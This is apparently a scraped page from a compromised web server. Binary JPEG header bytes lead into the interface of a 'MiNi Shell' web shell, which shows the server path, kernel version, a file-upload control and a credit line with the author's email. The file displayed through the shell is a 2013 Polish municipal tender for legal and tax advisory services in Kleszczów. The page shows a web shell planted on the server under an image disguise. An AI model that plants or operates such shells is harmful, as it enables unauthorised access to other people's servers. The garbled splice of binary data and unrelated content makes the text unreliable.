JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130611/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130611/223486-N-2013.html

<p class="kh_header"><b>Kleszczów: Usługi doradztwa prawnego i podatkowego z zakresu finansów publicznych na rzecz Gminy Kleszczów i jej jednostek organizacyjnych; IZP.271.1.8.2013</b><br>
<b>Numer ogłoszenia: 223486 - 2013; data zamieszczenia: 11.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Kleszczów , ul. Główna 47, 97-410 Kleszczów, woj. łódzkie, tel. (044) 731 31 10, faks (044 ) 731 31 30.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kleszczow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi doradztwa prawnego i podatkowego z zakresu finansów publicznych na rzecz Gminy Kleszczów i jej jednostek organizacyjnych; IZP.271.1.8.2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest USŁUGA DORADZTWA PRAWNEGO I PODATKOWEGO  Z ZAKRESU FINANSÓW PUBLICZNYCH (w szczególności gospodarka budżetowa, sprawozdawczość budżetowa, dotacje, dochody gminy, wpływy podatkowe, inne należności publicznoprawne, tj. opłaty eksploatacyjne, opłaty przewidziane w przepisach szczególnych, których beneficjentem jest gmina) NA RZECZ GMINY KLESZCZÓW I JEJ JEDNOSTEK ORGANIZACYJNYCH  (Gminny Ośrodek Pomocy Społecznej,  2 szkoły podstawowe, gimnazjum, zespół szkół ponadgimnazjalnych, 3 przedszkola).
W ramach świadczonych usług wykonawca zobowiązany będzie do obsługi podatkowej i prawnej,  w szczególności spraw dotyczących problematyki:
1. opracowywania projektów aktów prawnych rady gminy i organu wykonawczego gminy, w szczególności z zakresu finansów publicznych, podatków i opłat lokalnych,
2. poboru opłat, kar i innych należności publicznoprawnych wynikających z przepisów:
    - o planowaniu i zagospodarowaniu przestrzennym,
    - o gospodarce nieruchomościami,
    - o drogach publicznych
    - ochronie środowiska,
    - o ochronie przyrody,
    - prawo geologiczne i górnicze,
3. egzekucji należności publicznoprawnych, co do których gmina bądź jej organy wykonują funkcję wierzyciela bądź wierzyciela i organu egzekucyjnego,
4.  udzielania, kontroli, rozliczania i zwrotu dotacji celowych, dotacji podmiotowych i dotacji przedmiotowych (oraz dotacji o charakterze mieszanym) udzielanych z budżetu Gminy na podstawie przepisów:
   - o finansach publicznych, 
   - o działalności pożytku publicznego i o wolontariacie,
   - o sporcie,
   - o ochronie środowiska,
   - o ochronie przeciwpożarowej,
   - prawo wodne
   - o systemie oświaty.
5. poboru podatków i opłat lokalnych (podatku od nieruchomości, rolnego, leśnego, od posiadania psów, opłaty targowej) oraz  opłaty skarbowej,
6. prowadzenia postępowań administracyjnych wynikających z przepisów:
   - o ewidencji ludności i o dowodach osobistych
   - o dostępie do informacji publicznej-
   - o dostępie do informacji o środowisku
   - o gospodarce nieruchomościami - w szczególności dotyczące opłat adiacenckich 
   - o planowaniu i zagospodarowaniu przestrzennym - w szczególności dotyczące renty planistycznej,
   - prawo wodne
   - o drogach publicznych
   - prawo o ruchu drogowym
   - o ochronie przyrody
7. trybu i procedur obowiązujących w gospodarce finansowej jednostek samorządu terytorialnego (w szczególności uchwalanie budżetu, uchwalanie wieloletniej prognozy finansowej, udzielanie absolutorium przez radę gminy, tworzenie funduszu sołeckiego),
8. sprawozdawczości budżetowa jednostek samorządu terytorialnego,
9. zagadnień podatku od towarów i usług w gminie,
10. zagadnień podatku dochodowego od osób fizycznych dotyczących gminy,
11.gospodarki finansowej jednostek budżetowych oraz rozliczeń finansowych pomiędzy jednostkami a Urzędem Gminy.
12. zawierania porozumień pomiędzy jednostkami samorządu terytorialnego dotyczących przekazywania i powierzania zadań oraz środków finansowych,
13. zagadnień kontroli jednostek samorządu przez Regionalną Izbę Obrachunkową i Najwyższą Izbę Kontroli,
14. procedur odpowiedzialności za naruszenie dyscypliny finansów publicznych..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.11.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że posiada wpis na listę radców prawnych, adwokatów lub ukończone studia prawnicze i wpis na listę doradców podatkowych.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie uznany za spełniony, jeżeli Wykonawca wykaże się posiadaniem wiedzy i doświadczenia w zakresie wykonania przedmiotu zamówienia polegającym na należytym wykonaniu w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy -  w tym okresie - co najmniej dwóch usług (umów) polegających na stałej obsłudze prawnej i podatkowej  jednostek samorządu terytorialnego, w tym co najmniej 1 usługa (umowa) o wartości nie mniejszej niż 100.000,00 zł brutto, odpowiadających swym zakresem przedmiotowi niniejszego zamówienia.
Zamawiający dopuszcza  w zakresie spełniania warunków wiedzy i doświadczenia wykazanie świadczenia usług zarówno na podstawie umowy o pracę jak i stałej umowy zlecenia a także umowy  zawartej w ramach prowadzonej działalności gospodarczej.
Przez usługi odpowiadające  swym zakresem przedmiotowi niniejszego zamówienia Zamawiający rozumie usługi dotyczące obsługi prawnej i podatkowej w zakresie spraw dotyczących:
1. opracowywania projektów aktów prawnych rady gminy i organu wykonawczego gminy, w szczególności z zakresu finansów publicznych, podatków i opłat lokalnych,
2. poboru opłat, kar i innych należności publicznoprawnych wynikających z przepisów:
	- o planowaniu i zagospodarowaniu przestrzennym,
	- o gospodarce nieruchomościami,
	- o drogach publicznych
	- ochronie środowiska,
	- o ochronie przyrody,
	- prawo geologiczne i górnicze,
3. egzekucji należności publicznoprawnych, co do których gmina bądź jej organy wykonują funkcję wierzyciela bądź wierzyciela i organu egzekucyjnego,
4.  udzielania, kontroli, rozliczania i zwrotu dotacji celowych, dotacji podmiotowych i dotacji przedmiotowych (oraz dotacji o charakterze mieszanym) udzielanych z budżetu Gminy na podstawie przepisów:
- o finansach publicznych, 
- o działalności pożytku publicznego i o wolontariacie,
- o sporcie,
- o ochronie środowiska,
- o ochronie przeciwpożarowej,
- prawo wodne
- o systemie oświaty.
5. poboru podatków i opłat lokalnych (podatku od nieruchomości, rolnego, leśnego, od posiadania psów, opłaty targowej) oraz  opłaty skarbowej
6. prowadzenia postępowań administracyjnych wynikających z przepisów:
- o ewidencji ludności i o dowodach osobistych
- o dostępie do informacji publicznej-
- o dostępie do informacji o środowisku
- o gospodarce nieruchomościami - w szczególności dotyczące opłat adiacenckich 
- o planowaniu i zagospodarowaniu przestrzennym - w szczególności dotyczące renty planistycznej
- prawo wodne
- o drogach publicznych
- prawo o ruchu drogowym
- o ochronie przyrody
7. trybu i procedur obowiązujących w gospodarce finansowej jednostek samorządu terytorialnego (w szczególności uchwalanie budżetu, uchwalanie wieloletniej prognozy finansowej, udzielanie absolutorium przez radę gminy, tworzenie funduszu sołeckiego),
8. sprawozdawczości budżetowa jednostek samorządu terytorialnego,
9. zagadnień podatku od towarów i usług w gminie,
10. zagadnień podatku dochodowego od osób fizycznych dotyczących gminy,
11. gospodarki finansowej jednostek budżetowych oraz rozliczeń finansowych pomiędzy jednostkami a Urzędem Gminy.
12. zawierania porozumień pomiędzy jednostkami samorządu terytorialnego dotyczących przekazywania i powierzania zadań oraz środków finansowych,
13. zagadnień kontroli jednostek samorządu przez Regionalną Izbę Obrachunkową i Najwyższą Izbę Kontroli,
14. procedur odpowiedzialności za naruszenie dyscypliny finansów publicznych.
15.uczestnictwo w obradach rady gminy oraz komisji rady. 
Wykonawca musi posiadać doświadczenie w wykonywaniu/ obsłudze prawnej i podatkowej wszystkich w/w spraw.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że dysponuje  min. 1 osobą spełniającą  warunki: 
1)		Wpis na listę adwokatów, radców prawnych albo ukończone studia prawnicze 	oraz wpis na listę doradców podatkowych.
2)	  Wymagane doświadczenie zawodowe osoby, która będzie osobiście świadczyła 	usługi na rzecz Zamawiającego: 
	a) wykonała w okresie ostatnich 5 lat przed upływem terminu składania ofert co najmniej dwie usługi (umowy) polegające na stałej obsłudze 	prawnej i podatkowej jednostek samorządu terytorialnego, w tym co najmniej 1 usługa (umowa) o wartości nie mniejszej niż 100.000,00 zł brutto odpowiadająca swym zakresem przedmiotowi niniejszego zamówienia i trwająca co najmniej 12 miesięcy każda,  gdzie przez usługę odpowiadającą swym zakresem przedmiotowi zamówienia Zamawiający rozumie usługę dotyczącą obsługi prawnej i podatkowej w zakresie spraw dotyczących:
1. opracowywania projektów aktów prawnych rady gminy i organu wykonawczego gminy, w szczególności z zakresu finansów publicznych, podatków i opłat lokalnych,
2. poboru opłat, kar i innych należności publicznoprawnych wynikających z przepisów:
- o planowaniu i zagospodarowaniu przestrzennym,
- o gospodarce nieruchomościami,
- o drogach publicznych
- ochronie środowiska,
- o ochronie przyrody,
- prawo geologiczne i górnicze,
3. egzekucji należności publicznoprawnych, co do których gmina bądź jej organy wykonują funkcję wierzyciela bądź wierzyciela i organu egzekucyjnego,
4.  udzielania, kontroli, rozliczania i zwrotu dotacji celowych, dotacji podmiotowych i dotacji przedmiotowych (oraz dotacji o charakterze mieszanym) udzielanych z budżetu Gminy na podstawie przepisów:
- o finansach publicznych, 
- o działalności pożytku publicznego i o wolontariacie,
- o sporcie,
- o ochronie środowiska,
- o ochronie przeciwpożarowej,
- prawo wodne
- o systemie oświaty.
5. poboru podatków i opłat lokalnych (podatku od nieruchomości, rolnego, leśnego, od posiadania psów, opłaty targowej) oraz  opłaty skarbowej
6. prowadzenia postępowań administracyjnych wynikających z przepisów:
- o ewidencji ludności i o dowodach osobistych
- o dostępie do informacji publicznej-
- o dostępie do informacji o środowisku
- o gospodarce nieruchomościami - w szczególności dotyczące opłat adiacenckich 
- o planowaniu i zagospodarowaniu przestrzennym - w szczególności dotyczące renty planistycznej
- prawo wodne
- o drogach publicznych
- prawo o ruchu drogowym
- o ochronie przyrody
7. trybu i procedur obowiązujących w gospodarce finansowej jednostek samorządu terytorialnego (w szczególności uchwalanie budżetu, uchwalanie wieloletniej prognozy finansowej, udzielanie absolutorium przez radę gminy, tworzenie funduszu sołeckiego),
8. sprawozdawczości  budżetowej jednostek samorządu terytorialnego,
9. zagadnień podatku od towarów i usług w gminie,
10. zagadnień podatku dochodowego od osób fizycznych dotyczących gminy,
11. gospodarki finansowej jednostek budżetowych oraz rozliczeń finansowych pomiędzy jednostkami a Urzędem Gminy.
12. zawierania porozumień pomiędzy jednostkami samorządu terytorialnego dotyczących przekazywania i powierzania zadań oraz środków finansowych,
13. zagadnień kontroli jednostek samorządu przez Regionalną Izbę Obrachunkową i Najwyższą Izbę Kontroli,
14. procedur odpowiedzialności za naruszenie dyscypliny finansów publicznych.
15.uczestnictwa w obradach rady gminy oraz komisji rady.
Zamawiający dopuszcza  w zakresie spełniania powyższego warunku wykazanie świadczenia usług zarówno na podstawie umowy o pracę jak i stałej umowy zlecenia a także umowy  zawartej w ramach prowadzonej działalności gospodarczej. W/w osoba musi posiadać doświadczenie w wykonywaniu / obsłudze prawnej i podatkowej wszystkich w/w spraw.

b)	posiada co najmniej 5-letnie doświadczenie w obsłudze prawnej i podatkowej 	jednostek samorządu terytorialnego liczone od dnia uzyskania uprawnień do 	wykonywania zawodu radcy prawnego, adwokata, doradcy podatkowego.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 30.00</li>
<li>2 - Ilość obsługiwanych jednostek samorządu terytorialnego - 20.00</li>
<li>3 - Lata doświadczenia zawodowego - 50.00</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający na podstawie art. 144 przewiduje zmianę umowy w zakresie  terminu realizacji, warunków płatności, wynagrodzenia, sposobu i zakresu wykonania przedmiotu umowy:
	-	z powodu zmiany przepisów prawa powszechnie obowiązującego 	wpływających na sposób spełnienia świadczenia,
	-	z powodu okoliczności siły wyższej, tj. wystąpienia zdarzenia losowego (np. 	choroby) wywołanego przez czynniki zewnętrzne,
	-	uzasadnionych zmian okresu świadczenia usługi oraz w sposobie wykonania przedmiotu zamówienia, w szczególności zmiany dni i godzin świadczenia usługi.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.kleszczow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy 97-410 Kleszczów, ul. Główna 47.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.06.2013 godzina 14:30, miejsce: siedziba UG w Kleszczowie; kancelaria ogólna (nr 8).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com